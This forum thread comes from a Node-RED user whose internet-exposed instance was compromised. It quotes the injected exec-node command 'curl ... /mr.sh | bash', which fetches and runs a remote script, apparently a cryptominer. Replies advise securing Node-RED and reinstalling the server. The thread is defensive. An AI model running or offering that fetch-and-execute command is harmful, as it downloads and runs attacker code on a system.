Have I got a virus in Node-red?

Hi,

I get alot of new tabs, with 3 things in them.
Timestamp, exec and msg.payload
All new tabs look the same. The exce node has this in it:
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"

Which seem to be a cryptominig crap... (I found out after some googling).

It also goes in my cron (running on a ubuntu-server computer).

How do I delete this?
I have tried to clean node red, plus the cron. But after a day it's all back there....
Any ideas?

Short answer: yes

Others have been affected by it this weekend: Missing and mysterious new flows

It comes as a result of you exposing node-red on the internet with no security applied.

Without doing a careful examination of what that script does, the only safe way to be sure is to reinstall the server. And make sure you secure node-red properly before considering exposing it on the internet. If you removed it without securing node-red, there's nothing stopping them from redeployed their flow.

If I get time, I'll report this to UK CiSP. I'll also see if I can track down the owner of that IP address and see if we can kill it off.

@knolleary, you might want to let the IBM security guys know since Node-RED still has associations with IBM.

Really, it needs someone to kill off that script.

That link tells you what you missed......There is more to it than just clearing node-red and the cron job.

Thanks!
Have deleted those files as well now!

That’s assuming you have identified all the software that has been downloaded.

To be absolutely safe you would need to reformat the hard disk and start again